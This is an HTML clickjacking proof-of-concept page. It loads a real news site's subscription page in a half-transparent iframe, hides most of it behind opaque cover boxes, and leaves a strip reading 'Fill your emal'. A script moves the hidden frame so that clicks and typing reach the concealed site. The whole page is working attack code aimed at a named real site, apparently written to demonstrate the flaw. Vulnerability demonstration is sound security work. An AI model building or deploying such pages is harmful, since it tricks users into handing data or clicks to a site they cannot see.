<html>
   <head>

       <style type="text/css"><!--
       *{
           margin:0;
           padding:0;
       }
       body {
           background:#ffffff;
       }
       .button
       {
           padding:5px;
           background:#6699CC;
           left:275px;
           width:120px;
           border: 1px solid #336699;
       }
       #content {
           width: 500px;
           height: 500px;
           margin-top: 150px ;
           margin-left: 500px;
       }
       #clickjacking
       {
           position: absolute;
           left: 172px;
           top: 60px;
           filter: alpha(opacity=0.5);
           opacity:0.5
       }

       #cover1 {
           border: 1px solid black;
           position: absolute;
           top: 50px;
           height: 450px;
           width: 900px;
            background: wheat;
           z-index: 999;
       }

       #cover2 {
           border: 1px solid black;
           position: absolute;
           top: 550px;
           height: 400px;
           width: 900px;
           background: wheat;
           z-index: 999;
       }
       #cover-em {
           border: 1px solid red;
           position: absolute;
           top: 500px;
           width: 900px;
           height: 50px;
       }
       //--></style>

     <title>Clickjack test page</title>
   </head>
   <body>
   <script
           src="https://code.jquery.com/jquery-3.3.1.slim.min.js"
           integrity="sha256-3edrmyuQ0w65f8gfBsqowzjJe2iM6n0nKciPUp8y+7E="
           crossorigin="anonymous"></script>
     <p>Website is vulnerable to clickjacking!</p>
     <div id="cover1">This is</div>
     <div id="cover-em">Fill your emal</div>
     <div id="cover2">CLICKJACKING</div>
     <iframe src="https://service.sme.sk/predplatne" width="500" height="800" id="clickjacking"></iframe>


   <script>

       $('body').on('click', function(){
           console.log('click');
       });

       $('#cover1').mouseout(function(){
           setTimeout(function() {
               $('#clickjacking').css('top', -67);
           }, 1000);
       });
   </script>
   </body>
</html>